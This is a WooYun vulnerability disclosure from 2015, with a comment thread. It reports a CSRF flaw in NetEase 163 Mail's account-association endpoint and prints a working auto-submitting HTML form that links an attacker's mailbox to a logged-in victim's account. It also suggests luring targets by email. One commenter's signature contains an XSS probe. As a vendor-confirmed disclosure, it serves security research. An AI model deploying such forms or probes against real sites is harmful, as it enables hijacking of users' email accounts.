当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147846

漏洞标题:网易某处点开我的链接就会被盗号

相关厂商:网易

漏洞作者: 子非海绵宝宝

提交时间:2015-10-19 18:18

修复时间:2015-12-07 15:10

公开时间:2015-12-07 15:10

漏洞类型:CSRF

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-19: 细节已通知厂商并且等待厂商处理中
2015-10-23: 厂商已经确认,细节仅向厂商公开
2015-11-02: 细节向核心白帽子及相关领域专家公开
2015-11-12: 细节向普通白帽子公开
2015-11-22: 细节向实习白帽子公开
2015-12-07: 细节向公众公开

简要描述:

RT

详细说明:

网易对接口管理不是很到位
没什么好说的CSRF而已
直接看利用代码

<form action="https://ssl.mail.163.com/config.mail.163.com/multiAccount/service/relateAccount.do" method="post"> 
<input type="text" name="relUsername" value="自己的邮箱@163.com" />
<input type="text" name="relPassword" value="自己的密码" />
<input type="text" name="inmail" value="false" />
<input type="text" name="from" value="urspage" />
<input type="text" name="callback" value="parent.relateCallback" />
<input type="text" name="retype" value="1" />
<script> document.forms[0].submit(); </script>
</form>


把此表单插入任意页面中
只要邮箱处在登入状态即可关联帐号
关联的帐号就可以登录目标用户的邮箱 简单易操作 点开链接即可
也可以直接诶发邮箱给目标用户 里面放个链接 引诱点击即可

漏洞证明:

1.png

修复方案:

你猜

版权声明:转载请注明来源 子非海绵宝宝@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-10-23 15:09

厂商回复:

感谢您对网易的关注!漏洞已交付开发人员修复

最新状态:

暂无


漏洞评价:

评论

  1. 2015-10-19 18:20 | hkAssassin ( 普通白帽子 | Rank:377 漏洞数:70 | 我是一只毛毛虫。)

    我擦,我的邮箱就是这么被你弄走的吧!

  2. 2015-10-19 18:20 | 故滨 ( 普通白帽子 | Rank:166 漏洞数:31 )

    补刀

  3. 2015-10-19 18:21 | 泳少 ( 普通白帽子 | Rank:232 漏洞数:80 | ★ 梦想这条路踏上了,跪着也要...)

    原来是你~

  4. 2015-10-19 18:24 | 血梦 ( 实习白帽子 | Rank:43 漏洞数:12 | 一个自学成才的零零后。)

    我草 666

  5. 2015-10-19 18:25 | k0_pwn ( 路人 | Rank:2 漏洞数:2 | 专注二进制许多年,突然觉得web才好玩)

    卧槽,6666666

  6. 2015-10-19 18:27 | 采菇凉的小蘑菇 ( 路人 | Rank:2 漏洞数:1 | 孩子不哭 站起来撸)

    我草 666666

  7. 2015-10-19 18:28 | Yuku ( 路人 | Rank:21 漏洞数:19 | 酱油哥)

    666666666

  8. 2015-10-19 18:29 | sqlfeng ( 普通白帽子 | Rank:204 漏洞数:36 | 我的中国心)

    我草 666666

  9. 2015-10-19 18:30 | sqlfeng ( 普通白帽子 | Rank:204 漏洞数:36 | 我的中国心)

    赶快评论,要不然抢不到前排了!

  10. 2015-10-19 18:35 | 毕月乌 ( 普通白帽子 | Rank:120 漏洞数:16 | 猜猜我是谁?)

    神补刀!顺便,前排广告位招租!

  11. 2015-10-19 18:36 | 大师兄 ( 路人 | Rank:14 漏洞数:6 | 每日必关注乌云)

    我是海绵宝宝,又搞到一个号,test,发个评论试试!

  12. 2015-10-19 18:37 | 恶人毛 ( 实习白帽子 | Rank:38 漏洞数:4 | 深挖洞,广积粮。)

    网易该续费了。。

  13. 2015-10-19 18:39 | 雷少 ( 实习白帽子 | Rank:73 漏洞数:31 | 热爱网络的爱好者,需求同道中人。)

    原来是你脱他的 裤子 还 强奸 了他不仅不给【钱】还打了他一巴掌!好狠

  14. 2015-10-19 18:41 | 熊猫 ( 实习白帽子 | Rank:64 漏洞数:33 | panda)

    6

  15. 2015-10-19 18:41 | Bird ( 实习白帽子 | Rank:60 漏洞数:25 | Stay hungry. Stay foolish.)

    我是海绵宝宝,又搞到一个号,test,发个评论试试!

  16. 2015-10-19 18:41 | 随风的风 ( 普通白帽子 | Rank:170 漏洞数:56 | 微信公众号:233sec 不定期分享各种漏洞思...)

    网易刚刚说,自己是最安全的邮箱。。

  17. 2015-10-19 18:41 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀,伊雅伊尔哟。)

    这刀补得丧心病狂。。

  18. 2015-10-19 18:42 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    真牛。。。。。。。

  19. 2015-10-19 18:45 | 进击的zjx ( 普通白帽子 | Rank:621 漏洞数:100 )

    补刀狂魔

  20. 2015-10-19 18:45 | 无路赛 ( 路人 | Rank:4 漏洞数:2 | 不明真相的围观群众)

    补得一手好刀

  21. 2015-10-19 18:49 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1741 漏洞数:278 | ...........................................)

    @子非海绵宝宝 快把邮箱还给我

  22. 2015-10-19 18:49 | Mieless ( 实习白帽子 | Rank:33 漏洞数:9 | 我是来打酱油的。)

    fuck up

  23. 2015-10-19 18:51 | 晏子 ( 路人 | Rank:6 漏洞数:4 | 无)

    还好不用网易邮箱关联其他。

  24. 2015-10-19 18:54 | 千与千寻 ( 路人 | Rank:15 漏洞数:2 | 感谢乌云给了我这么好的学习机会!)

    CCTV看这里!!

  25. 2015-10-19 19:02 | 红客十年 ( 普通白帽子 | Rank:336 漏洞数:64 | 去年离职富士康,回到家中上蓝翔,蓝翔毕业...)

    神补刀啊

  26. 2015-10-19 19:18 | 李白 ( 普通白帽子 | Rank:142 漏洞数:29 )

    补刀

  27. 2015-10-19 19:24 | AnD ( 路人 | Rank:13 漏洞数:3 | 菜个几年,也就没那么菜了)

    脱裤呢,怎么没上首页

  28. 2015-10-19 19:49 | 547 ( 路人 | Rank:11 漏洞数:5 | ::)

    这个是脱裤的前奏么?

  29. 2015-10-19 19:52 | 天朝城管 ( 普通白帽子 | Rank:116 漏洞数:35 | 不要等到命玩你的时候才开始玩命)

    66666

  30. 2015-10-19 20:29 | 慢慢 ( 普通白帽子 | Rank:648 漏洞数:187 | 学习新姿势~)

    补刀

  31. 2015-10-19 20:31 | 泪雨无魂 ( 普通白帽子 | Rank:168 漏洞数:47 )

    补刀

  32. 2015-10-19 20:32 | 末影人 ( 实习白帽子 | Rank:35 漏洞数:9 | 末影人(Enderman)是一个三个方格高的人形生...)

    怪不得几天前我邮箱有异地登录记录,幸好我立即改了密码

  33. 2015-10-19 20:54 | hecate ( 普通白帽子 | Rank:545 漏洞数:87 | ®高级安全工程师 | WooYun认证√)

    这是在争上头条的节奏么

  34. 2015-10-19 21:05 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  35. 2015-10-19 21:08 | onpu ( 普通白帽子 | Rank:108 漏洞数:29 | nopu)

    神补刀!顺便,前排广告位招租!

  36. 2015-10-19 21:19 | 233 ( 路人 | Rank:14 漏洞数:4 | 小孩子看了根本把持不住)

    又来,66666

  37. 2015-10-19 21:37 | Daryl ( 路人 | Rank:16 漏洞数:5 | '"><img/src=1 onerror=alert('干啥啥不会'...)

    。。。神补刀。。。补刀也得按照基本法

  38. 2015-10-19 21:39 | 小杰哥 ( 普通白帽子 | Rank:179 漏洞数:28 | 逆水行舟,不进则退。)

    补刀王

  39. 2015-10-19 21:52 | px1624 ( 普通白帽子 | Rank:1038 漏洞数:177 | px1624)

    补刀。。

  40. 2015-10-19 22:55 | Inset ( 路人 | Rank:8 漏洞数:1 | 闲来无事,到处逛逛!)

    补刀

  41. 2015-10-19 23:00 | 梧桐树下 ( 普通白帽子 | Rank:262 漏洞数:42 | 一大波洞正在过来……)

    这个和呆子不开口什么关系?

  42. 2015-10-19 23:13 | rqndx ( 路人 | Rank:9 漏洞数:3 | 再好的技术也入侵不了你的心。)

    666666666666~网易受难日

  43. 2015-10-19 23:23 | 金馆长 ( 路人 | Rank:4 漏洞数:2 | Up)

    火钳刘翔

  44. 2015-10-19 23:33 | huoji ( 实习白帽子 | Rank:41 漏洞数:10 | 目标是当个农民)

    补刀王

  45. 2015-10-20 00:11 | _Thorns ( 普通白帽子 | Rank:1320 漏洞数:209 | WooYun is the Bigest gay place :))

    主任!!!快把我的帐号还给我。

  46. 2015-10-20 00:24 | Q1NG ( 普通白帽子 | Rank:111 漏洞数:21 | 临 兵 斗 者 皆 阵 列 前 行 !)

    这一刀补得漂亮,大家多来几刀^-^

  47. 2015-10-20 07:53 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    神补刀

  48. 2015-10-20 08:06 | Vie ( 路人 | Rank:0 漏洞数:2 | ^_^)

    神补刀!

  49. 2015-10-20 08:35 | xunnun ( 普通白帽子 | Rank:145 漏洞数:50 | )

    快,再来几刀

  50. 2015-10-20 09:09 | 草榴社区 ( 普通白帽子 | Rank:109 漏洞数:26 | 未满18周岁,不准进入.)

    上头条

  51. 2015-10-20 09:55 | loli 认证白帽子 ( 普通白帽子 | Rank:608 漏洞数:56 | 每个男人心中都住着一个叫小红的88号技师。)

    我不信

  52. 2015-10-20 11:40 | 大大灰狼 ( 普通白帽子 | Rank:248 漏洞数:53 | Newbie)

    我不信

  53. 2015-10-20 12:24 | zhxs ( 实习白帽子 | Rank:42 漏洞数:22 | Jyhack-TeaM:http://bbs.jyhack.com/)

    宝宝蒙蒙的

  54. 2015-10-20 13:22 | ba1ma0 ( 路人 | Rank:4 漏洞数:1 | 什么都不会..)

    原来是你。

  55. 2015-10-20 13:25 | Msl ( 路人 | Rank:25 漏洞数:5 )

    来来来……瓜子、矿泉水、辣条、小板凳开始出售啦……客官 我们还有前排的座位出售……

  56. 2015-10-20 16:07 | Mo_ ( 路人 | Rank:4 漏洞数:1 | Mo_梦)

    瓜子、矿泉水、辣条、小板凳开始出售啦……客官 我们还有前排的座位出售……

  57. 2015-10-21 03:26 | rootnmxx ( 路人 | Rank:5 漏洞数:1 )

    又搞了一个号感觉顶下我人气